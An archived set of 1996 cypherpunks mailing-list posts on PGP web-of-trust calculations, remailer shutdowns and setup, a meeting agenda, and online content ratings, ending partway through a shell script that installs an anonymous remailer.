From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Thu, 9 May 1996 20:40:48 +0800
To: Raph Levien <cypherpunks@toad.com
Subject: Re: Transitive trust and MLM
Message-ID: <adb72eeb0b021004f545@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:32 AM 5/8/96, Raph Levien wrote:
<SNIP>
>   One encouraging consequence of this model is that densely connected
>subgraphs can result in highly trusted keys even if p itself is quite
>small. In a clique of size k, the trust is (very) roughly 1-(1-p)^k. For
>example, if p is a mere 50%, then in a clique of size 10, each key in
>the clique is trusted with a probability of 99.9%.
>   This computation is (I think) known as the network reachability
>problem, and is probably quite hard to evaluate. In practice, you'd
>probably want to compute upper and lower bounds instead,
>
>   Let's see if we can come up with a model that preserves this property
>of giving high trust values to densely connected keys, yet is also
>highly resistant to (some plausible model) of attacks against the Web of
>trust.
>
>Raph


I like this. The most obvious attack on key signatures is to cross sign a
huge number of bogus keys, is of no benefit. As the density of this
bugus-clique increases, it comes closer and closer to acting as a single
entity for trust calculations. Then your trust calculation for any key in
the clique is simply your trust of the real key which signed all the bogus
ones. It should be no time at all before most reputable key signers cut all
links to that key.

Another nice property of this calculation of probability is that it
automatically drops off exponentially with the number of links (at least
along any one chain). We need to think about how much we want multiplicity
of paths to bolster our trust. Here is the scenario I want to avoid:

  Mallet creates a large number of keys: A, B, C[...]. C is a large set of keys.
  A is the Key Mallet uses publicly. It has a few signatures.
  B is the key Mallet uses to sign keys who's trust he wants to boost.
  In addition to signing B with A, Mallet also signes all the C[i] with A, and
  signs B with all the C[i]. This multiplicity of paths should not boost the
  trust in any key which is reached through this complex.

In general it may be difficult to decipher which paths you want to follow
in multiply (and cyclically) connected paths.

I suppose one approach to this would be to pick various ways of calculating
trust, and see if anyone can come up examples to attacks to exploit them.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@basement.replay.com>
Date: Thu, 9 May 1996 13:42:31 +0800
To: cypherpunks@toad.com
Subject: remailer@utopia.hacktic.nl down
Message-ID: <199605082121.XAA24292@basement.replay.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Release date:
Wednesdag, May 8, 1996
Amsterdam, The Netherlands

General announcement,

Due to recent events the Hacktic Foundation has decided to
discontinue its remailing operations, the remailer that is
operated by the Hacktic Foundation will cease to exist May
20th. 

Please update your reply blocks if you use the above mentioned 
remailer <remailer@utopia.hacktic.nl> for your nym reply block.

bEST Regards,
 -AJ-

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMZCdsVnfdBSNVpE9AQF85wQAuDfE3icuDCzA99biqd9qk6VK8zUEFvEp
OgZvqfGD8OxG8ElnFMQk2VMHskUK8QxidO+zKPUZrJNd4eBSiFSNIK7BAox1xMQm
hUGTzLEBBGc3Hxg4pYc3Y2A7PDhU7GJusCZmk89zPUI4ouN+CHYQnZ4PMggB1Hmo
coambU0vmD4=
=ZdIS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 May 1996 20:08:09 +0800
To: cypherpunks@toad.com
Subject: Re: Senator Leahy's Public Key
Message-ID: <adb6e40b00021004fa1d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:16 AM 5/9/96, Eric Eden wrote:

>What if you needed to set up a key server for a mass base of customers...
>Obviously, authenticating them via e-mail would be difficult, verifying
>them in person would be harder.  Would there be any reasonable way to

"Verifying them in person" would, in fact, be essentially impossible. Few
sources of documentation mean much, in fact. Consider that I joined Intel
in 1974 and was never once asked for any form of identification...I just
showed up for work under my assumed name, Tim May, and no one was the
wiser.

Ask yourself this: Have you _ever_ really "verified" the identity of your
girlfriend, your friends, your co-workers? (I mean this not to pose an
existential riddle of no real significance, but to remind people how seldom
we ever actually try to verify that people are "really" who they say they
are.)

...
>pretend that the labor is not the deciding factor.  What would be the
>best way to verify the customers keys if you couldn't visit each
>customer in person?

Representatives from my ISP, got.net, have attended some of my
parties...and they _still_ don't know that I am _actually_ Irving J.
Schlublutz, temporarily masquerading as "Tim May."\

>For example, would a photo copy of a drivers license be enough?

For which purposes? DLs are notoriously easy to forge. I think $25 is the
going price. (And DLs which would fool people like us are probably doable
on any H-P color inkjet printer.)

My point in all this being that "proofs of identity" aren't all they're
cracked up to be.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@ecotone.toad.com>
Date: Thu, 9 May 1996 22:57:43 +0800
To: cypherpunks-announce@toad.com
Subject: MEETING: Cypherpunks May 11th San Francisco Bay Area Meeting
Message-ID: <199605091007.DAA24110@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain



  The monthly meeting of any Cypherpunks in the San Francisco Bay area
will happen this Saturday May 11th, 12:00 noon till about dinner time
(say 18:00, 6pm).
  We are going to try meeting in back of the Tresidder Union at
Stanford University in the court yard (by the elevator tower).
  Tresidder Union is a little (peninsula) west of the Stanford main
Quad, there is a parking lot just p-west of of the Union that you can
park in on weekends.  The best automotive access is from the west via
Junipero Serra Blvd. (also called Foothill Expressway, Santa Cruz Ave
& Alameda De Las Pulgus) into the 'back' of the Stanford Campus, look
it up on a map folks.  For some semi-useful maps try:
http://www.stanford.edu/home/visitors/maps.html
  There is a chance we will get a room to meet in, in that case there
will be a sign/person telling you where to go.  If not there is a
raised area in the court yard (under the tree) that will be the
gathering area.  In the case of rain (and no room) we will meet in the
pub in the (peninsula) south west corner of the Union.
  If you have things you want to talk about at this meeting, or can
help in some way please email me.

		||ugh Daniel
		hugh@toad.com


Vague Agenda:
12:00
	Meeting intro, Hugh Daniel on Crypto GUI's and toolkits to
	build them.  Discussion on Crypto GUI design.

12:30
	Review of various Crypto GUI's (lead by Hugh Daniel)

		Various Java applets
		CyberCash Wallet
		Various Graphic PGP Shells
		Skey
		Others?

	Please email examples of good or bad Crypto GUI's to demo at
	the meeting.  I have a FreeBSD/Windross-95 laptop to demo
	them on (we could use a larger display then my laptop screen).

13:30
	  Norm Hardy on Keys(capabilities), what they are, how they
	can make things secure if done right, and what the functional
	difference might look like to an end user.

14:30
	Break

15:00
	  Electronic Communities presentation on "E", an extension of
	Java to provide Keys(capabilities) in a commercial environment.

16:00
	  Marianne Mueller & John Gilmore report on the recent Java
	Security workshop.

17:00
	  Open for breaking issues, future meeting planing etc.

18:00
	  Break for dinner.  At 20:00 there will be a PenSFA party (
	PenSFA is the Peninsula Area Science Fiction Assn.) in San
	Carlos (12 miles up Alameda De Las Pulgus).  Talk to me at
	the meeting for more info.

	  For dinner I will suggest 'Thai City', about a 2 kilometers
	south of Page Mill at 4329 El Camino Real.  It is on the
	Peninsula East side of the road, white building with a purple
	stripe around it and some {}`s (really).  +1 415 493 0643





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DrG <manus@manus.org>
Date: Thu, 9 May 1996 23:02:15 +0800
To: freedom-knights@jetcafe.org
Subject: Re: Internet/Obscenity Legal Gathering in NYC
In-Reply-To: <aDZmND88w165w@bwalk.dm.com>
Message-ID: <Pine.BSD.3.91.960509060429.13423F-100000@india.lm.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 May 1996, Dr. Dimitri Vulis wrote:

> I haven't seen this announcement reposted to this mailing list, and I think
> it's of sufficient interest to warrant reposting:
> 
> Newsgroups: misc.legal,alt.censorship,misc.legal.moderated,talk.politics,alt.privacy
> From: ra@panix.com (Ron Abramson)
> Subject: Free program on net censorship in NYC
> Message-ID: <Dr1vDJ.Cr8@world.std.com>
> Date: Mon, 6 May 1996 17:49:08 GMT
> 
> Announcement: Free Program On Net Censorship
> in New York City, May 22 at 7:30 P.M.
> --------------------------------------------
> 
> THE FIRST AMENDMENT IN CYBERSPACE:  Regulating the On-Line
> Dissemination of "Indecent Material"
> 
> This program will address the issue of the First Amendment as
> applied to the Internet and On-line services.  Special focus
> will be given to the new federal law which is intended to
> regulate the dissemination of "Indecent Material" via these
> mediums.
> 
Now just WHY do these assholes wast everybodies time talking about something
that everybody KNOWS is unconstitutional?

These fucking lawyers just pull the stunts so they can go and have lunch 
in a tax-deductable manner, and meet the requirements for some CLE hours 
that is mandated by the State. This whole affair will be a sham as usual.

> The Association of the Bar of the City of New York
> 42 W 44TH Street, New York, New York (Bet. 5th and 6th Avenues)
> (212) 382-6600
> 

This New York Bar has the WORST reputation of any local
association that I know.  Last year they discussed the
legalization of crack and other hard drugs in a "drug-law
revamping" seminar, and Mayor Guliani almost SHIT!

> Wednesday, May 22, 1996, 7:30 till 9 P.M.
> 
> Moderator:
> CHARLES R. NESSON
> Weld Professor of Law, Harvard law School
> 
> Panelists:
> ROBERT FLORES
> Senior Trial Attorney, Child Exploitation and Obscenity
> Section, U.S. Department of Justice
> 

See, the "kid-porn" is the whole fucking issue here, and they
are going to go trying to regulate text because if this concern.

> MICHAEL GODWIN
> General Counsel, Electronic Frontier Foundation
> 

That guy is an asshole. The whole EFF is a joke!

> STEPHEN M. HEATON
> General Counsel, Compuserve, Inc.
> 
Censorous bastard.

> NORMAN REDLICH
> Wachtell, Lipton Rosen & Katz, former Dean,
> New York University School of Law
> 
> BRUCE TAYLOR
> President and Chief Counsel, National Center for
> Children and Families
> 
See, this porn issue is diluting everything.

> Co-sponsored by:
> Committee on Computer Law, Joseph P. Zammit, Chair
> Committee on Lectures and Continuing Education,
>   Normal L. Green, Chair
> 

Yes, to get "continuing legal education" credits for
just BULLSHITTING about something these lawyers are all
incompetent at.

> Members of the Association, their guests and all other
> interested persons are invited to attend.
> 
> No fees or reservations are required.
> 
> 
> ---
> 
> Dr. Dimitri Vulis
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

Go to this meeting and ask these fucking dumb lawyers how the fuck they 
expect to enforce a law against US citizens that they cannot enforce against
Canadian or Mexican citizens.  The whole fucking concept of trying to 
regulate cyberspace by the laws of any one country is ABSURD!

Then ask them if any of them know who tale or speedbump is.
If they do not know that, they have no reason even talking
about cyberspace.


-DrG






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Husa, Carl (MSX)" <CHusa@CRTINC.COM>
Date: Fri, 10 May 1996 00:27:52 +0800
To: "'cypherpunks@toad.com>
Subject: FW: Science Project Fair
Message-ID: <c=US%a=_%p=Computer_Resourc%l=PANDORA-960509112051Z-119@pandora.crtinc.com>
MIME-Version: 1.0
Content-Type: text/plain




>----------
>From: 	Beverly. Ferguson[SMTP:103014.3727@CompuServe.COM]
>Sent: 	Wednesday, May 08, 1996 9:38 PM
>To: 	KOMBUCHA DIGEST; PARACELSUS DIGEST
>Subject: 	Science Project Fair
>
>
>Originally Posted To:
>
>>Date:         Fri, 3 May 1996 09:58:55 -0400
>>Sender:       Methods of Teaching Mathematics <TEACHMAT@UICVM.UIC.EDU>
>>From:         Peggy R Shearin <pshearin@WARREN.CES.NCSU.EDU>
>>Subject:      Science Fair Project
>
>>>Hi, our names are Stevie and Amanda. We are in the 5th grade at
>>>the Phillipston Memorial school, Phillipston, Massachusetts, USA.
>>>We are doing a science project on the Internet. We want to see
>>>how many responses we can get back in two weeks. (We are only
>>>sending out 2 letters).
>
>>>Please respond and then send this letter to anyone you
>>>communicate with on the Internet.
>
>>>Respond to smc@tiac.net.
>>>^^^^^^^^^^^^^^^^^^^^^^^
>
>>>1. Where do you live (state and country)?
>
>
>>>2. From whom did you get this letter?
>
>
>>>Thank you,
>>>Stevie and Amanda
>
>------------------------------
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Fri, 10 May 1996 01:58:15 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Penet-style web remailer?
Message-ID: <2.2.32.19960509120014.0068d0b0@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 PM 5/8/96 EDT, you wrote:
>	http://noah.pair.com/anon.html. It appears to be
>sort of a penet-style anonymous remailer, only without return messages. Anyone
>know anything else about it?
-----BEGIN PGP SIGNED MESSAGE-----

I have tried noah.pair.com in several tests and for seemingly secure
communications with good results.  In addition I have carried on an e-mail
conversation with him.  Give him a try.
Alec
camcc@abraxis.com
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZHduCKJGkNBIH7lAQF8HgQArQRgSTMWL0WcAkv9Byk1ZghBYsI9AxRF
mxE3nGnHu4H8dhMQXZtUOoY0LN7GkdcCYH8LBab91XwaJCYp3j5WqVt4xPP+feF5
hUTch6VUb/dPB1VYEfHjwNXPAhkOuM2Noarq3cFqbhJNK4UkC1IzNhy1rrhE2yZ+
Yyzv8ppwe4g=
=d9bl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Smith" <msmith@rebound.slc.unisys.com>
Date: Fri, 10 May 1996 07:25:19 +0800
To: warlord@MIT.EDU (Derek Atkins)
Subject: Re: Senator Leahy's Public Key
In-Reply-To: <9605081459.AA20668@bart-savagewood.MIT.EDU>
Message-ID: <199605091408.OAA17613@rebound.slc.unisys.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> > Actually, I've been thinking about this, and how do we *really* know that
> > *anyone's* keys are actually theirs?  I'm new to this list and have been 
> > collecting some of the keys from people who post with PGP signatures, but 
> > even at that, I never certify them myself because I am not 100% absolutely
> > certain that the key in question belongs to that person.  After all, what
> > if some clever hacker dropped in and replaced someone's .plan file, or 
> > edited their index.html file?  There's no real way to be absolutely 
> > certain.
> 
> This is exactly what the web of trust is about.  The fact is that you
> can't trust the Keyservers (they were never designed to be trusted);
> you can't trust .plan files; you can't trust index.html files.
> However you can trust signatures made by trusted keys.  That is why
> the web of trust works.
> 
> For example, I've met in person with a lot of people and we've signed
> each others' keys.  We've used various methods to "prove" identity.
> Sometimes it's been a long time of personal interactions (close
> friends).  Sometimes it's been a number of certifying documents, IDs,
> etc.  Sometimes it's been a piece of knowledge that I know the other
> has but no one else has.

The problem is entering this "Web of trust".  You have to know someone who
is already in The Web in order to start signing your keys.  I don't know
anyone around here who uses PGP but me.  That's why I've been getting
keys off of this list.  Gotta start somewhere, however, I feel that this 
is a very shaky way to start.

> The point is that once I'm attached to the web of trust I have a means
> to verify other keys.  I can set up a CA that way (MIT has one) --
> there is a keysigner that will use out-of-band means to verify the
> identity of a user and then use that to sign a PGP key in that
> person's name.

I agree that once the WOT is set up, everything should work hunky dory, but
introducing yourself into this web isn't an easy thing.  Since we know that
the keyservers aren't bulletproof, how many keys do I grab from there in 
order to start my keyring?  One?  Ten?  500?  Statistically speaking, how 
many of those have been compromised and can no longer be trusted?

> You just need to look at it from a different angle.

That's what I'm trying to do.  Maybe I'm just looking at it all backwards 
or something, but it's something I've been thinking about since I've been 
collecting keys lately.

> -derek

- -- 
Matt Smith - msmith@unislc.slc.unisys.com
"Nothing travels faster than light, with the possible exception of bad news, 
which follows its own rules." - Douglas Adams, "Mostly Harmless"
Disclaimer:  I came up with these ideas, so they're MINE!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZH8YcWUKiYjg/fZAQFk+QQA047pGZizSijPPBksY8nmZTQLdwaOene4
uO5p/ykHfPull03gzvYJ8ueDLlmttqSaf6y2e63RDgLNh5m8K0q88vOzkd0qQ+qf
LxC2ZVmGk3eIsRG9KLFdRMrPsJ0hmo/AfZ8DwF6SUz8+KXbxIHcN0LjTx4XBKIqz
wkpcnF0nLAM=
=Gd3m
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Fri, 10 May 1996 05:36:56 +0800
To: cypherpunks@toad.com
Subject: Re: hacktic.nl is down!!
In-Reply-To: <199605090206.TAA21691@netcom4.netcom.com>
Message-ID: <Pine.NEB.3.93.960509083830.21231E-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 8 May 1996, Dave Harman wrote:

> > I just heard on IRC channel #scientology from Karen Spaink that hacktic.nl
> > will be down as of 5/20 because of pressure from Scientology.
> > 
> > I don't have any more details yet.
> 
> Also the spam from anti-racist assholes in alt.politics.white-power.

	I just spoke to Alex de Joode. Hacktic is in fact going down due
to the Co$. I've been asked to remove the hacktic remailer from
mixmaster's type2.list.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp2.0, a Pine/PGP interface.

iQCVAwUBMZH4OlOTpEThrthvAQGUxAQAgQGmOlMtCpMEzW4zowR8DFDc4szdlFJN
4Bv5B9cqTuRmsoxni+tVx8f/ilwos+7fWzFAh0ocSKOmYnRDYndeeYYtNG/hUgYO
5nw2KpHyST4/HaseTvGU2fQh+0Rwqh8DieTVE2/rW+JTUf9RXLGW2GIf+ET/U8Pt
h0SnXGTE+sU=
=A4iN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Elizabeth Schwartz <betsys@cs.umb.edu>
Date: Fri, 10 May 1996 04:14:38 +0800
To: cypherpunks@toad.com
Subject: Re: "Bit Tax" proposed by satan@hell.gov
In-Reply-To: <m0uFlts-00094fC@pacifier.com>
Message-ID: <199605091326.AA05762@xt.cs.umb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> >>The problem with a tax on data is that it would be *extremely* unfair.
> >
> >Chill out, it's not a real proposal.
> 

It has no chance of flying because it would penalize people for downloading
advertising onto their machines. All those nifty marketing graphics.
Big business, little business, political campaign material; there's no
chance at all.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 May 1996 15:19:57 +0800
To: cypherpunks@toad.com
Subject: re: Dempster-Shafer...(re: Transitive
Message-ID: <adb76a4b01021004849b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:18 AM 5/9/96, watson@tds.com wrote:
>tcmay's approach is elegant, and it's refreshing to find a practical use
>for AI approaches.  I think it needs one more step, though.  If we learn
>to quantify our trust in a key, we still need to know what the threshold
>should be for a given application.  Maybe I can get by with a 0.05 Bel
>for posting to cypherpunks, but maybe I want a 0.95 for a monetary
>transaction.  Seems to need a comprehensive risk management approach,

[was the rest accidentally cut off?]

Anyway, I agree that a more comprehensive system is needed. But even
attaching belief estimates to keys, for example, goes a long way in letting
others than do some transitive calculations.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Fri, 10 May 1996 08:39:09 +0800
To: cypherpunks@toad.com
Subject: Remailer fot NT
Message-ID: <199605091429.JAA14103@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Thu May 09 09:28:20 1996
Does anyone know of a remailer that runs undet NT.  If not, any source that 
might be ripe for a port.

Lou Z.

Lou Zirko                                (502)383-2175
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMZIBJBKvccEAmlQ9AQGs5Af+I8BfY640aj/e483mDzbdHOioEaPrQmZ1
R8rA7H0Kg29VU4/4f+Y5J66ZshMVr4ojOYzj8/H7mrsCjsZPx7MjBqiIH1pbUouG
ky0NvGLw+HeBRWZz1OSElDUYE+QMHnMr2CxYnaepS/91erJmpt0xE5/oXVohEQOq
q/ARLWAYw4FJ6n7cgDDfkcxp5scHthLsAzMCbuHxfsvzAm/1LdU/QFvUWG2+BNv3
4Hx2TWasGWaSfX/+zZGuXHA123JW2frE98o+nRORcM5y7kCOaXPP69xp+aAJsGdh
wf7M/ekRhBjfJgdOLtgID+zKBJbZEHA3kGgCmHdz1ynoWiXnMcTlcw==
=bWV8
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TQDB <tqdb@wichita.fn.net>
Date: Fri, 10 May 1996 08:56:26 +0800
To: cypherpunks@toad.com
Subject: Looking for someone to speak on JAVA security issues (fwd)
Message-ID: <Pine.BSI.3.91.960509101223.2606A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Thu, 09 May 1996 03:25:29 -0700
From: The Dark Tangent <dtangent@defcon.org>
To: dc-stuff@fc.net
Subject: Looking for someone to speak on JAVA security issues

If you or someone you know has seen a Java security expert who would speak at 
DEF CON, please have them contact me!

-- 
     Hey!  All my mail is sniffed!  Don't forget to PGP important stuff.
  PGP Key (2.3a & 2.6) on key servers or mail me. Voice (AT&T) 0-700-TANGENT

DEF CON mailing list, mail: majordomo@fc.net with "subscribe dc-announce" in
   the body. DEF CON FTP: ftp.fc.net /pub/defcon http://www.defcon.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 10 May 1996 19:12:06 +0800
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: self-ratings vs. market ratings
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-960508194708Z-15104@tide21.microsoft.com>
Message-ID: <199605091813.LAA24532@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



BW:
>I think of a rating as something which is attached to something
>"pre-knowledge", whereas a reputation is something which develops over
>time & based upon informed knowledge ("after-knowledge").

you are free to assume any connotation you like. but in my view
they are pretty much interchangeable. they are both "meta
information"-- information about other things or information.

a credit rating is in fact a "credit reputation"-- it is a built
up credit history over time. maybe you would prefer the term
"credit reputation"?

>A rating is applied to something (a service or whatever) by only those
>few individuals who are acquainted with what they are rating.
>
>A reputation is accumulated by the impressions made upon larger numbers
>of individuals - a general population not necessarily employed to
>collect these impressions - but who have nevertheless sufficient
>exposure to and acquaintanceship with the person/service/etc. to make an
>informed conclusion about it.  
>
>A rating can make a statement on what something "is" or is expected to
>be (eg, general in content vs explicitly sexual), where a reputation
>reflects on past behavior.

oh, ok, a reputation would refer to a person, and a rating might
refer to a thing. a valid distinction, but not necessary for a 
system that is purely electronic. people and things could be 
rated interchangeably. but of course in the "people" case you 
are going to get a lot more political fire. issues like libel
and defamation come up. it will be interesting to see how they
are resolved.

again, I suspect in the future the distinctions you refer to
are going to blur. there will just be ratings of all kinds of
things, including people. some ratings will be based on 
expert opinions, some will be based ona consensus of opinions
measured somehow ("reputation"), some will be purely objective
such as "score on last driving exam", etc.

of course all kinds of nasty issues like privacy etc. rear their
head. I don't claim to have an answer or clearcut guidelines
for all this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Fri, 10 May 1996 20:53:09 +0800
To: cypherpunks@toad.com
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <9605091517.AA09590@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 08 May 1996 19:34:50 -0400
>To: tcmay@got.net (Timothy C. May)
>From: "Joseph M. Reagle Jr." <reagle@mit.edu>
>Subject: Re: Mandatory Voluntary Self-Ratings
>
>At 09:58 AM 5/8/96 -0700, you wrote:
>>At 9:31 PM 5/7/96, Joseph M. Reagle Jr. wrote:
>
>>Should "voluntary self-criticism" become widespread, I expect to rate all
>>of my posts as suitable for children of all ages, suitable for
>>hypersensitive feminists, suitable for Jews and Gentiles alike, and so on.
>>Regardless of whether I'm advocating post-birth abortions or forced
>>encheferation of Muslim girls.
>
>        I've figured out where my differences between myself and others
lay. The _only_ system and service that I am aware of that is distributing
PICS labels is RSAC. (http://www.rsac.org) They are what one could call an
objective and non-arbitrary content rating system rather than an
"appropriateness" system. "Appropriateness" systems will be valuable 3rd
party systems when the vigilantes and fundamentalists wish to create label
bureaus. For self labeling, if many people (main stream people) are going to
use that system within their browser, it will have to have mind share. If
it's going to have mind share, I think it would be advantegeous to it to be
a descriptive label rather than "appropriate." Hence, much of the concerns
I'm hearing aren't so worrisome to me.
>
> I'll have more on that when a case study I'm working on with some
colleagues for a Sloan on ecommerce course at MIT is finished.. (in about a
week, and I should then be making that and my thesis available.)
>
>>I say it's a waste of our time to even be thinking or worrying about how to
>>implement an infrastructure for ratings. In fact, building such an
>>infrastructure could make later imposition of "mandatory voluntary ratings"
>>(Orwell would be unsurprised) a greater likelihood.
>
>        Maybe, maybe not, hard to say... This or the -L18, both are easy
for an ignornant legislator to approve.
>
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Fri, 10 May 1996 23:35:20 +0800
To: Lance Cottrell <loki@infonex.com>
Subject: Re: remailer-in-a-box
In-Reply-To: <adb5ec01090210047acd@[206.170.115.3]>
Message-ID: <Pine.A32.3.93.960509105054.31020A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


> At 3:51 PM 5/7/96, anonymous-remailer@shell.portal.com wrote:
> >No one answered me.
> >What's the best remailer-in-a-box.
> >I'd like to run one.  I would think people would be falling
> >over eachother to tell me.
> 
> The reason for the quiet may be twofold. First, I and many others delete
> unread list messages with out subjects. 

Aye..

>Second, remailer-in-a-box does not
> really exist. Mixmaster, and most of the other remailers are fairly easy to
> set up for anyone with UNIX experience. I run Mixmaster + Ghio + reorder
> scripts.

I wrote a one part shell script which will run on most unix systems. It
will install a working type-1 ghio remailer on most shell accounts in
about 20seconds. It wont do reordering or Mix but its effortless <shrug>.

Below is the readme and the shell script.. if you just want a remailer and
you want it NOW, export this message, cut this text and the text of the
readme file out, and then follow the directions below. Yippy.

--Ben

__________________________________
REAME.build-remailer
__________________________________

This is the 10 second remailer package. The idea is from Sameer, and the 
C source is from Matt Ghio. This script will install a bare-bones 
cypherpunk style remailer on your shell account.  Making it work is simple:

1) Type:      chmod 700 build-remailer

2) Type:      build-remailer

3) Enter the email address of the remailer. This is optional. You may use 
   any address you like, or you may enter none at all. If you don't enter an
   email address here the address "nobody@foo.com" will appear in all 
   outbound mail from the mailer, and also in the mailers help files. 

4) If no errors are generated, then your all set. Send some mail to
   yourself to test that it is working. Refer to the remailers help file
   for details.


___________________________
build-remailer
---------------------------

----CUT HERE----CUT HERE----CUT HERE----CUT HERE----CUT HERE----

echo "Warning: This will DESTROY your existing .forward file."
echo "Type CTRL-C Now To Abort. I'll wait 10 Seconds For You."
sleep 10s
echo "Ok, here we go."
echo -e "\n"
echo "Getting Variables:"
xspool=$MAIL
echo "Found Mailspool as: $xspool"
xsendmail=`which sendmail`
echo "Found Sendmail as: $xsendmail"
xls=`which ls`
echo "Found ls as: $xls"
xdir=$HOME/.mailx
echo "Installing in: $xdir"
mkdir $xdir
echo "Enter the email address of the mailer now."
echo "You can leave this blank if you want."
read xaddr
if [ `echo $xaddr | wc -w` -eq 0 ]
then
xaddr="nobody@nowhere.com"
fi
cd $xdir
> remailer.c
echo "Building C Source."
echo "
#define DIR \"$xdir\"
#define ANONFROM \"From: $xaddr (Anonymous)\\n\"
#define REMAILERFROM \"From: $xaddr (Remailer)\\n\"
#define REMAILERADDRESS \"$xaddr\"
#define RETURN \"xaddr\"
#define DISCLAIMER \"Comments: Please report misuse of this automated remailing service to <$xaddr>\\n\"
#define NONANONDISC \"Comments: This message was forwarded by an automated remailing service.  No attempt was made to verify the sender's identity.  Please report misuse to <$xaddr>\\n\" 
#define SPOOL \"$xspool\"
#define SPAM_THRESHOLD 25
#define WAIT_SEC 30
#define DEFAULT_LATENCY 0

#define PGP \"/usr/local/bin/pgp\"
#define PGPPASS \"password\"
#define PGPPATH DIR
#define INEWS \"/usr/lib/news/inews\"
#define NNTPSERVER \"127.0.0.1\"
#define LS \"$xls\"
